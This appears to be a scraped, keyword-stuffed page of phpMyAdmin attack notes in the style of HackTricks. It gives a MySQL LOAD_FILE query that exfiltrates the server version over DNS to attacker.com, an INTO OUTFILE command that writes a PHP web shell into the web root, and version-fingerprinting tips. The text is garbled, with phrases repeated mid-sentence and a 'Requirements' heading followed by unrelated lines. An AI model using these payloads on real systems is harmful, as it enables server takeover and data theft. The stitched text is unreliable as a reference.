Phpmyadmin Hacktricks Verified -

If outbound internet is allowed but direct connections monitored, use DNS:

SELECT LOAD_FILE(CONCAT('\\\\', (SELECT @@version), '.attacker.com\\share\\test'));

Verified: Works on Windows MySQL (due to UNC path behavior). On Linux, requires Dns-loadfile UDF. phpmyadmin hacktricks verified

If you have credentials, you can use SQL to write a webshell: If outbound internet is allowed but direct connections

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Requirements:

Look for /phpmyadmin/themes/pmahomme/img/logo_left.png. Combined with doc/html/index.html or README, you can extract the exact version. Version matters because exploits differ widely between 2.x, 3.x, 4.x, and 5.x. Verified: Works on Windows MySQL (due to UNC path behavior)

HackTricks Tip: Use whatweb target.com/phpmyadmin – it often extracts version from meta generators.

Sometimes an attacker only gets low-priv database access but no file write. Still dangerous.